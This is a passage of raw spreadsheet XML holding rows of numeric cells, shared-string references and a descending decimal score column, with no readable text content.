    <row r="12790" ht="15.75" customHeight="1">
      <c r="A12790" s="1">
        <v>6500.0</v>
      </c>
      <c r="B12790" s="2">
        <v>4.8712979E7</v>
      </c>
      <c r="C12790" s="2" t="s">
        <v>12299</v>
      </c>
      <c r="D12790" s="2">
        <v>1.0</v>
      </c>
      <c r="E12790" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12790" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="12791" ht="15.75" customHeight="1">
      <c r="A12791" s="1">
        <v>5925.0</v>
      </c>
      <c r="B12791" s="2">
        <v>4.7232323E7</v>
      </c>
      <c r="C12791" s="2" t="s">
        <v>12300</v>
      </c>
      <c r="D12791" s="2">
        <v>1.0</v>
      </c>
      <c r="E12791" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12791" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="12792" ht="15.75" customHeight="1">
      <c r="A12792" s="1">
        <v>8028.0</v>
      </c>
      <c r="B12792" s="2">
        <v>5.2814373E7</v>
      </c>
      <c r="C12792" s="2" t="s">
        <v>12301</v>
      </c>
      <c r="D12792" s="2">
        <v>1.0</v>
      </c>
      <c r="E12792" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12792" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="12793" ht="15.75" customHeight="1">
      <c r="A12793" s="1">
        <v>26065.0</v>
      </c>
      <c r="B12793" s="2">
        <v>1.5546825E7</v>
      </c>
      <c r="C12793" s="2" t="s">
        <v>12302</v>
      </c>
      <c r="D12793" s="2">
        <v>1.0</v>
      </c>
      <c r="E12793" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12793" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="12794" ht="15.75" customHeight="1">
      <c r="A12794" s="1">
        <v>33673.0</v>
      </c>
      <c r="B12794" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C12794" s="2" t="s">
        <v>12303</v>
      </c>
      <c r="D12794" s="2">
        <v>1.0</v>
      </c>
      <c r="E12794" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12794" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="12795" ht="15.75" customHeight="1">
      <c r="A12795" s="1">
        <v>31833.0</v>
      </c>
      <c r="B12795" s="2">
        <v>5256443.0</v>
      </c>
      <c r="C12795" s="2" t="s">
        <v>12304</v>
      </c>
      <c r="D12795" s="2">
        <v>1.0</v>
      </c>
      <c r="E12795" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12795" s="2">
        <v>0.111965811965812</v>
      </c>
    </row>
    <row r="12796" ht="15.75" customHeight="1">
      <c r="A12796" s="1">
        <v>13945.0</v>
      </c>
      <c r="B12796" s="2">
        <v>3.7198649E7</v>
      </c>
      <c r="C12796" s="2" t="s">
        <v>12305</v>
      </c>
      <c r="D12796" s="2">
        <v>1.0</v>
      </c>
      <c r="E12796" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12796" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="12797" ht="15.75" customHeight="1">
      <c r="A12797" s="1">
        <v>15894.0</v>
      </c>
      <c r="B12797" s="2">
        <v>4.4566326E7</v>
      </c>
      <c r="C12797" s="2" t="s">
        <v>12306</v>
      </c>
      <c r="D12797" s="2">
        <v>1.0</v>
      </c>
      <c r="E12797" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12797" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="12798" ht="15.75" customHeight="1">
      <c r="A12798" s="1">
        <v>28295.0</v>
      </c>
      <c r="B12798" s="2">
        <v>2.5593485E7</v>
      </c>
      <c r="C12798" s="2" t="s">
        <v>12307</v>
      </c>
      <c r="D12798" s="2">
        <v>1.0</v>
      </c>
      <c r="E12798" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12798" s="2">
        <v>0.1102430555555556</v>
      </c>
    </row>
    <row r="12799" ht="15.75" customHeight="1">
      <c r="A12799" s="1">
        <v>26742.0</v>
      </c>
      <c r="B12799" s="2">
        <v>1.8297931E7</v>
      </c>
      <c r="C12799" s="2" t="s">
        <v>12308</v>
      </c>
      <c r="D12799" s="2">
        <v>1.0</v>
      </c>
      <c r="E12799" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12799" s="2">
        <v>0.1102150537634408</v>
      </c>
    </row>
    <row r="12800" ht="15.75" customHeight="1">
      <c r="A12800" s="1">
        <v>14135.0</v>
      </c>
      <c r="B12800" s="2">
        <v>3.7917609E7</v>
      </c>
      <c r="C12800" s="2" t="s">
        <v>12309</v>
      </c>
      <c r="D12800" s="2">
        <v>1.0</v>
      </c>
      <c r="E12800" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12800" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="12801" ht="15.75" customHeight="1">
      <c r="A12801" s="1">
        <v>32882.0</v>
      </c>
      <c r="B12801" s="2">
        <v>6345110.0</v>
      </c>
      <c r="C12801" s="2" t="s">
        <v>12310</v>
      </c>
      <c r="D12801" s="2">
        <v>1.0</v>
      </c>
      <c r="E12801" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12801" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="12802" ht="15.75" customHeight="1">
      <c r="A12802" s="1">
        <v>17304.0</v>
      </c>
      <c r="B12802" s="2">
        <v>4.9276492E7</v>
      </c>
      <c r="C12802" s="2" t="s">
        <v>12311</v>
      </c>
      <c r="D12802" s="2">
        <v>1.0</v>
      </c>
      <c r="E12802" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12802" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="12803" ht="15.75" customHeight="1">
      <c r="A12803" s="1">
        <v>34141.0</v>
      </c>
      <c r="B12803" s="2">
        <v>9822345.0</v>
      </c>
      <c r="C12803" s="2" t="s">
        <v>12312</v>
      </c>
      <c r="D12803" s="2">
        <v>1.0</v>
      </c>
      <c r="E12803" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12803" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="12804" ht="15.75" customHeight="1">
      <c r="A12804" s="1">
        <v>19660.0</v>
      </c>
      <c r="B12804" s="2">
        <v>5.636528E7</v>
      </c>
      <c r="C12804" s="2" t="s">
        <v>12313</v>
      </c>
      <c r="D12804" s="2">
        <v>1.0</v>
      </c>
      <c r="E12804" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12804" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="12805" ht="15.75" customHeight="1">
      <c r="A12805" s="1">
        <v>25880.0</v>
      </c>
      <c r="B12805" s="2">
        <v>1.4962832E7</v>
      </c>
      <c r="C12805" s="2" t="s">
        <v>12314</v>
      </c>
      <c r="D12805" s="2">
        <v>1.0</v>
      </c>
      <c r="E12805" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12805" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="12806" ht="15.75" customHeight="1">
      <c r="A12806" s="1">
        <v>29457.0</v>
      </c>
      <c r="B12806" s="2">
        <v>3.2249452E7</v>
      </c>
      <c r="C12806" s="2" t="s">
        <v>12315</v>
      </c>
      <c r="D12806" s="2">
        <v>1.0</v>
      </c>
      <c r="E12806" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12806" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="12807" ht="15.75" customHeight="1">
      <c r="A12807" s="1">
        <v>3652.0</v>
      </c>
      <c r="B12807" s="2">
        <v>3.9306177E7</v>
      </c>
      <c r="C12807" s="2" t="s">
        <v>12316</v>
      </c>
      <c r="D12807" s="2">
        <v>1.0</v>
      </c>
      <c r="E12807" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12807" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="12808" ht="15.75" customHeight="1">
      <c r="A12808" s="1">
        <v>15795.0</v>
      </c>
      <c r="B12808" s="2">
        <v>4.4211439E7</v>
      </c>
      <c r="C12808" s="2" t="s">
        <v>12317</v>
      </c>
      <c r="D12808" s="2">
        <v>1.0</v>
      </c>
      <c r="E12808" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12808" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="12809" ht="15.75" customHeight="1">
      <c r="A12809" s="1">
        <v>19704.0</v>
      </c>
      <c r="B12809" s="2">
        <v>5.6531426E7</v>
      </c>
      <c r="C12809" s="2" t="s">
        <v>12318</v>
      </c>
      <c r="D12809" s="2">
        <v>1.0</v>
      </c>
      <c r="E12809" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12809" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="12810" ht="15.75" customHeight="1">
      <c r="A12810" s="1">
        <v>33688.0</v>
      </c>
      <c r="B12810" s="2">
        <v>8455623.0</v>
      </c>
      <c r="C12810" s="2" t="s">
        <v>12319</v>
      </c>
      <c r="D12810" s="2">
        <v>1.0</v>
      </c>
      <c r="E12810" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12810" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="12811" ht="15.75" customHeight="1">
      <c r="A12811" s="1">
        <v>231.0</v>
      </c>
      <c r="B12811" s="2">
        <v>1.4758457E7</v>
      </c>
      <c r="C12811" s="2" t="s">
        <v>12320</v>
      </c>
      <c r="D12811" s="2">
        <v>1.0</v>
      </c>
      <c r="E12811" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12811" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12812" ht="15.75" customHeight="1">
      <c r="A12812" s="1">
        <v>534.0</v>
      </c>
      <c r="B12812" s="2">
        <v>1.8515151E7</v>
      </c>
      <c r="C12812" s="2" t="s">
        <v>12321</v>
      </c>
      <c r="D12812" s="2">
        <v>1.0</v>
      </c>
      <c r="E12812" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12812" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12813" ht="15.75" customHeight="1">
      <c r="A12813" s="1">
        <v>562.0</v>
      </c>
      <c r="B12813" s="2">
        <v>1.8936994E7</v>
      </c>
      <c r="C12813" s="2" t="s">
        <v>12322</v>
      </c>
      <c r="D12813" s="2">
        <v>1.0</v>
      </c>
      <c r="E12813" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12813" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12814" ht="15.75" customHeight="1">
      <c r="A12814" s="1">
        <v>1178.0</v>
      </c>
      <c r="B12814" s="2">
        <v>2.4637763E7</v>
      </c>
      <c r="C12814" s="2" t="s">
        <v>12323</v>
      </c>
      <c r="D12814" s="2">
        <v>1.0</v>
      </c>
      <c r="E12814" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12814" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12815" ht="15.75" customHeight="1">
      <c r="A12815" s="1">
        <v>1846.0</v>
      </c>
      <c r="B12815" s="2">
        <v>2.9422079E7</v>
      </c>
      <c r="C12815" s="2" t="s">
        <v>12324</v>
      </c>
      <c r="D12815" s="2">
        <v>1.0</v>
      </c>
      <c r="E12815" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12815" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12816" ht="15.75" customHeight="1">
      <c r="A12816" s="1">
        <v>2925.0</v>
      </c>
      <c r="B12816" s="2">
        <v>3.5873362E7</v>
      </c>
      <c r="C12816" s="2" t="s">
        <v>12325</v>
      </c>
      <c r="D12816" s="2">
        <v>1.0</v>
      </c>
      <c r="E12816" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12816" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12817" ht="15.75" customHeight="1">
      <c r="A12817" s="1">
        <v>3263.0</v>
      </c>
      <c r="B12817" s="2">
        <v>3.7441681E7</v>
      </c>
      <c r="C12817" s="2" t="s">
        <v>12326</v>
      </c>
      <c r="D12817" s="2">
        <v>1.0</v>
      </c>
      <c r="E12817" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12817" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12818" ht="15.75" customHeight="1">
      <c r="A12818" s="1">
        <v>3449.0</v>
      </c>
      <c r="B12818" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C12818" s="2" t="s">
        <v>12327</v>
      </c>
      <c r="D12818" s="2">
        <v>1.0</v>
      </c>
      <c r="E12818" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12818" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12819" ht="15.75" customHeight="1">
      <c r="A12819" s="1">
        <v>3451.0</v>
      </c>
      <c r="B12819" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C12819" s="2" t="s">
        <v>12328</v>
      </c>
      <c r="D12819" s="2">
        <v>1.0</v>
      </c>
      <c r="E12819" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12819" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12820" ht="15.75" customHeight="1">
      <c r="A12820" s="1">
        <v>4059.0</v>
      </c>
      <c r="B12820" s="2">
        <v>4.1132474E7</v>
      </c>
      <c r="C12820" s="2" t="s">
        <v>12329</v>
      </c>
      <c r="D12820" s="2">
        <v>1.0</v>
      </c>
      <c r="E12820" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12820" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12821" ht="15.75" customHeight="1">
      <c r="A12821" s="1">
        <v>4245.0</v>
      </c>
      <c r="B12821" s="2">
        <v>4.1801813E7</v>
      </c>
      <c r="C12821" s="2" t="s">
        <v>12330</v>
      </c>
      <c r="D12821" s="2">
        <v>1.0</v>
      </c>
      <c r="E12821" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12821" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12822" ht="15.75" customHeight="1">
      <c r="A12822" s="1">
        <v>4505.0</v>
      </c>
      <c r="B12822" s="2">
        <v>4.2579141E7</v>
      </c>
      <c r="C12822" s="2" t="s">
        <v>12331</v>
      </c>
      <c r="D12822" s="2">
        <v>1.0</v>
      </c>
      <c r="E12822" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12822" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12823" ht="15.75" customHeight="1">
      <c r="A12823" s="1">
        <v>4519.0</v>
      </c>
      <c r="B12823" s="2">
        <v>4.2607757E7</v>
      </c>
      <c r="C12823" s="2" t="s">
        <v>12332</v>
      </c>
      <c r="D12823" s="2">
        <v>1.0</v>
      </c>
      <c r="E12823" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12823" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12824" ht="15.75" customHeight="1">
      <c r="A12824" s="1">
        <v>4590.0</v>
      </c>
      <c r="B12824" s="2">
        <v>4.2803375E7</v>
      </c>
      <c r="C12824" s="2" t="s">
        <v>12333</v>
      </c>
      <c r="D12824" s="2">
        <v>1.0</v>
      </c>
      <c r="E12824" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12824" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12825" ht="15.75" customHeight="1">
      <c r="A12825" s="1">
        <v>4713.0</v>
      </c>
      <c r="B12825" s="2">
        <v>4.3287622E7</v>
      </c>
      <c r="C12825" s="2" t="s">
        <v>12334</v>
      </c>
      <c r="D12825" s="2">
        <v>1.0</v>
      </c>
      <c r="E12825" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12825" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12826" ht="15.75" customHeight="1">
      <c r="A12826" s="1">
        <v>5150.0</v>
      </c>
      <c r="B12826" s="2">
        <v>4.4685734E7</v>
      </c>
      <c r="C12826" s="2" t="s">
        <v>12335</v>
      </c>
      <c r="D12826" s="2">
        <v>1.0</v>
      </c>
      <c r="E12826" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12826" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12827" ht="15.75" customHeight="1">
      <c r="A12827" s="1">
        <v>5346.0</v>
      </c>
      <c r="B12827" s="2">
        <v>4.5344396E7</v>
      </c>
      <c r="C12827" s="2" t="s">
        <v>12336</v>
      </c>
      <c r="D12827" s="2">
        <v>1.0</v>
      </c>
      <c r="E12827" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12827" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12828" ht="15.75" customHeight="1">
      <c r="A12828" s="1">
        <v>5363.0</v>
      </c>
      <c r="B12828" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C12828" s="2" t="s">
        <v>12337</v>
      </c>
      <c r="D12828" s="2">
        <v>1.0</v>
      </c>
      <c r="E12828" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12828" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12829" ht="15.75" customHeight="1">
      <c r="A12829" s="1">
        <v>5992.0</v>
      </c>
      <c r="B12829" s="2">
        <v>4.743396E7</v>
      </c>
      <c r="C12829" s="2" t="s">
        <v>12338</v>
      </c>
      <c r="D12829" s="2">
        <v>1.0</v>
      </c>
      <c r="E12829" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12829" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12830" ht="15.75" customHeight="1">
      <c r="A12830" s="1">
        <v>6011.0</v>
      </c>
      <c r="B12830" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C12830" s="2" t="s">
        <v>12339</v>
      </c>
      <c r="D12830" s="2">
        <v>1.0</v>
      </c>
      <c r="E12830" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12830" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12831" ht="15.75" customHeight="1">
      <c r="A12831" s="1">
        <v>6482.0</v>
      </c>
      <c r="B12831" s="2">
        <v>4.8669836E7</v>
      </c>
      <c r="C12831" s="2" t="s">
        <v>12340</v>
      </c>
      <c r="D12831" s="2">
        <v>1.0</v>
      </c>
      <c r="E12831" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12831" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12832" ht="15.75" customHeight="1">
      <c r="A12832" s="1">
        <v>6517.0</v>
      </c>
      <c r="B12832" s="2">
        <v>4.8786111E7</v>
      </c>
      <c r="C12832" s="2" t="s">
        <v>12341</v>
      </c>
      <c r="D12832" s="2">
        <v>1.0</v>
      </c>
      <c r="E12832" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12832" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12833" ht="15.75" customHeight="1">
      <c r="A12833" s="1">
        <v>6650.0</v>
      </c>
      <c r="B12833" s="2">
        <v>4.909109E7</v>
      </c>
      <c r="C12833" s="2" t="s">
        <v>12342</v>
      </c>
      <c r="D12833" s="2">
        <v>1.0</v>
      </c>
      <c r="E12833" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12833" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12834" ht="15.75" customHeight="1">
      <c r="A12834" s="1">
        <v>6651.0</v>
      </c>
      <c r="B12834" s="2">
        <v>4.909109E7</v>
      </c>
      <c r="C12834" s="2" t="s">
        <v>12343</v>
      </c>
      <c r="D12834" s="2">
        <v>1.0</v>
      </c>
      <c r="E12834" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12834" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12835" ht="15.75" customHeight="1">
      <c r="A12835" s="1">
        <v>6999.0</v>
      </c>
      <c r="B12835" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C12835" s="2" t="s">
        <v>12344</v>
      </c>
      <c r="D12835" s="2">
        <v>1.0</v>
      </c>
      <c r="E12835" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12835" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12836" ht="15.75" customHeight="1">
      <c r="A12836" s="1">
        <v>7699.0</v>
      </c>
      <c r="B12836" s="2">
        <v>5.1971682E7</v>
      </c>
      <c r="C12836" s="2" t="s">
        <v>12345</v>
      </c>
      <c r="D12836" s="2">
        <v>1.0</v>
      </c>
      <c r="E12836" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12836" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12837" ht="15.75" customHeight="1">
      <c r="A12837" s="1">
        <v>7911.0</v>
      </c>
      <c r="B12837" s="2">
        <v>5.2493017E7</v>
      </c>
      <c r="C12837" s="2" t="s">
        <v>12346</v>
      </c>
      <c r="D12837" s="2">
        <v>1.0</v>
      </c>
      <c r="E12837" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12837" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12838" ht="15.75" customHeight="1">
      <c r="A12838" s="1">
        <v>8228.0</v>
      </c>
      <c r="B12838" s="2">
        <v>5.3350333E7</v>
      </c>
      <c r="C12838" s="2" t="s">
        <v>12347</v>
      </c>
      <c r="D12838" s="2">
        <v>1.0</v>
      </c>
      <c r="E12838" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12838" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12839" ht="15.75" customHeight="1">
      <c r="A12839" s="1">
        <v>8260.0</v>
      </c>
      <c r="B12839" s="2">
        <v>5.340628E7</v>
      </c>
      <c r="C12839" s="2" t="s">
        <v>12348</v>
      </c>
      <c r="D12839" s="2">
        <v>1.0</v>
      </c>
      <c r="E12839" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12839" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12840" ht="15.75" customHeight="1">
      <c r="A12840" s="1">
        <v>8480.0</v>
      </c>
      <c r="B12840" s="2">
        <v>5.4016667E7</v>
      </c>
      <c r="C12840" s="2" t="s">
        <v>12349</v>
      </c>
      <c r="D12840" s="2">
        <v>1.0</v>
      </c>
      <c r="E12840" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12840" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12841" ht="15.75" customHeight="1">
      <c r="A12841" s="1">
        <v>8642.0</v>
      </c>
      <c r="B12841" s="2">
        <v>5.4332619E7</v>
      </c>
      <c r="C12841" s="2" t="s">
        <v>12350</v>
      </c>
      <c r="D12841" s="2">
        <v>1.0</v>
      </c>
      <c r="E12841" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12841" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12842" ht="15.75" customHeight="1">
      <c r="A12842" s="1">
        <v>8756.0</v>
      </c>
      <c r="B12842" s="2">
        <v>5.4566282E7</v>
      </c>
      <c r="C12842" s="2" t="s">
        <v>12351</v>
      </c>
      <c r="D12842" s="2">
        <v>1.0</v>
      </c>
      <c r="E12842" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12842" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12843" ht="15.75" customHeight="1">
      <c r="A12843" s="1">
        <v>8814.0</v>
      </c>
      <c r="B12843" s="2">
        <v>5.4630493E7</v>
      </c>
      <c r="C12843" s="2" t="s">
        <v>12352</v>
      </c>
      <c r="D12843" s="2">
        <v>1.0</v>
      </c>
      <c r="E12843" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12843" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12844" ht="15.75" customHeight="1">
      <c r="A12844" s="1">
        <v>8914.0</v>
      </c>
      <c r="B12844" s="2">
        <v>5.4814632E7</v>
      </c>
      <c r="C12844" s="2" t="s">
        <v>12353</v>
      </c>
      <c r="D12844" s="2">
        <v>1.0</v>
      </c>
      <c r="E12844" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12844" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12845" ht="15.75" customHeight="1">
      <c r="A12845" s="1">
        <v>8918.0</v>
      </c>
      <c r="B12845" s="2">
        <v>5.4820798E7</v>
      </c>
      <c r="C12845" s="2" t="s">
        <v>12354</v>
      </c>
      <c r="D12845" s="2">
        <v>1.0</v>
      </c>
      <c r="E12845" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12845" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12846" ht="15.75" customHeight="1">
      <c r="A12846" s="1">
        <v>8927.0</v>
      </c>
      <c r="B12846" s="2">
        <v>5.483597E7</v>
      </c>
      <c r="C12846" s="2" t="s">
        <v>12355</v>
      </c>
      <c r="D12846" s="2">
        <v>1.0</v>
      </c>
      <c r="E12846" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12846" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12847" ht="15.75" customHeight="1">
      <c r="A12847" s="1">
        <v>9142.0</v>
      </c>
      <c r="B12847" s="2">
        <v>5.5258257E7</v>
      </c>
      <c r="C12847" s="2" t="s">
        <v>12356</v>
      </c>
      <c r="D12847" s="2">
        <v>1.0</v>
      </c>
      <c r="E12847" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12847" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12848" ht="15.75" customHeight="1">
      <c r="A12848" s="1">
        <v>9153.0</v>
      </c>
      <c r="B12848" s="2">
        <v>5.5274808E7</v>
      </c>
      <c r="C12848" s="2" t="s">
        <v>12357</v>
      </c>
      <c r="D12848" s="2">
        <v>1.0</v>
      </c>
      <c r="E12848" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12848" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12849" ht="15.75" customHeight="1">
      <c r="A12849" s="1">
        <v>9197.0</v>
      </c>
      <c r="B12849" s="2">
        <v>5.5395847E7</v>
      </c>
      <c r="C12849" s="2" t="s">
        <v>12358</v>
      </c>
      <c r="D12849" s="2">
        <v>1.0</v>
      </c>
      <c r="E12849" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12849" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12850" ht="15.75" customHeight="1">
      <c r="A12850" s="1">
        <v>9285.0</v>
      </c>
      <c r="B12850" s="2">
        <v>5.552928E7</v>
      </c>
      <c r="C12850" s="2" t="s">
        <v>12359</v>
      </c>
      <c r="D12850" s="2">
        <v>1.0</v>
      </c>
      <c r="E12850" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12850" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12851" ht="15.75" customHeight="1">
      <c r="A12851" s="1">
        <v>9927.0</v>
      </c>
      <c r="B12851" s="2">
        <v>5.6830851E7</v>
      </c>
      <c r="C12851" s="2" t="s">
        <v>12360</v>
      </c>
      <c r="D12851" s="2">
        <v>1.0</v>
      </c>
      <c r="E12851" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12851" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12852" ht="15.75" customHeight="1">
      <c r="A12852" s="1">
        <v>10004.0</v>
      </c>
      <c r="B12852" s="2">
        <v>5.7015772E7</v>
      </c>
      <c r="C12852" s="2" t="s">
        <v>12361</v>
      </c>
      <c r="D12852" s="2">
        <v>1.0</v>
      </c>
      <c r="E12852" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12852" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12853" ht="15.75" customHeight="1">
      <c r="A12853" s="1">
        <v>10235.0</v>
      </c>
      <c r="B12853" s="2">
        <v>5.7507459E7</v>
      </c>
      <c r="C12853" s="2" t="s">
        <v>12362</v>
      </c>
      <c r="D12853" s="2">
        <v>1.0</v>
      </c>
      <c r="E12853" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12853" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12854" ht="15.75" customHeight="1">
      <c r="A12854" s="1">
        <v>11019.0</v>
      </c>
      <c r="B12854" s="2">
        <v>1.7823877E7</v>
      </c>
      <c r="C12854" s="2" t="s">
        <v>12363</v>
      </c>
      <c r="D12854" s="2">
        <v>1.0</v>
      </c>
      <c r="E12854" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12854" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12855" ht="15.75" customHeight="1">
      <c r="A12855" s="1">
        <v>12432.0</v>
      </c>
      <c r="B12855" s="2">
        <v>2.921566E7</v>
      </c>
      <c r="C12855" s="2" t="s">
        <v>12364</v>
      </c>
      <c r="D12855" s="2">
        <v>1.0</v>
      </c>
      <c r="E12855" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12855" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12856" ht="15.75" customHeight="1">
      <c r="A12856" s="1">
        <v>12523.0</v>
      </c>
      <c r="B12856" s="2">
        <v>2.9711933E7</v>
      </c>
      <c r="C12856" s="2" t="s">
        <v>12365</v>
      </c>
      <c r="D12856" s="2">
        <v>1.0</v>
      </c>
      <c r="E12856" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12856" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
